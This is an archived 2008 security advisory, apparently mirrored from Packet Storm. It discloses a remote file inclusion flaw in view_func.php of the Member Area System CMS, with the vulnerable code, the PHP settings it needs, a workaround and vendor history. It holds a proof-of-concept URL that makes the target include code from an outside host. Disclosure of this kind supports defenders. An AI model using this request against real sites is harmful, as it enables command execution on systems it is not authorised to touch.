Lucene search

K

mas-rfi.txt

🗓️ 11 Jan 2008 00:00:00Reported by ShipNXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 28 Views

Member Area System (MAS) Remote File Include Vulnerability in view_func.php allows remote file inclusion and arbitrary command execution. Vendor: Mansion Production

Show more

AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`----------------------------------------------------------------------  
  
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)  
  
----------------------------------------------------------------------  
  
Author: ShipNX <ship_nx [AT] yahoo com>  
Impact: Remote file include  
Status: Patch not available  
  
----------------------------------------------------------------------  
  
Software description:  
  
Name: Member Area System (MAS)  
Version: Vendor does not disclose version information since v1.7.  
Probably later versions are also vulnerable  
Vendor: Mansion Productions  
Vendor homepage: http://www.mansionproductions.com/  
Software homepage: http://www.mansionproductions.com/mas/  
  
Description:  
MAS is a leading content management system (CMS) specially designed   
for adult-oriented sites managements. It is used on many major adult  
sites around the world.  
  
----------------------------------------------------------------------  
  
Vulnerability:  
  
Code: view_func.php  
  
...  
$path=dirname($i).'/';  
include($path.$l.'/'.'filelist.mas');  
...  
  
The variables $i and $l are not properly sanitized  
before using them in include() construction.   
If Register Globals = On and Allow URL Include (Allow URL Fopen) = On  
then an attacker can send the malicious request leading to remote  
file include and therefore arbitrary command execution.  
  
---------------------------------------------------------------------  
  
POC:  
  
Conditions:  
Register Globals = On  
Allow URL fopen (Allow URL include since PHP 5.2.0) = On  
  
http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?  
  
Note:   
  
justsomedir/ is required here as data passed via $i first gets sent to dirname() function  
which will product  
  
$path='http://remotesite.com/';  
  
The remote file should be placed at http://remotesite.com/testfile.txt  
  
----------------------------------------------------------------------  
  
Workaround:  
  
The vendor is aware of the vuln for ages (probably since 2006) so they  
recommend setting up Register Globals = Off. Not sure why they haven't  
patched the vuln already. If Register Globals is Off on your server, then  
you are more or less secure. If it is On, ask your system administrator  
to turn it Off. If for some reason you need Register Globals = On on your  
site (using old software etc), then contact the vendor and MAYBE they will  
finally patch the bug :-)  
  
----------------------------------------------------------------------  
  
History:  
  
Vuln found: Late 2005 :-))  
Vendor notified: Seems like the vendor knows of the vuln since 2006, but  
for some reason fails to patch the vuln. Maybe they just want it to keep  
quiet, or maybe the security matters just don't bother them - not sure.   
Anyway, maybe this advisory will finally force them to do patching :-))  
Advisory: 11/01/2008  
  
----------------------------------------------------------------------  
  
Thanks to:  
  
DeZender creators :-)  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo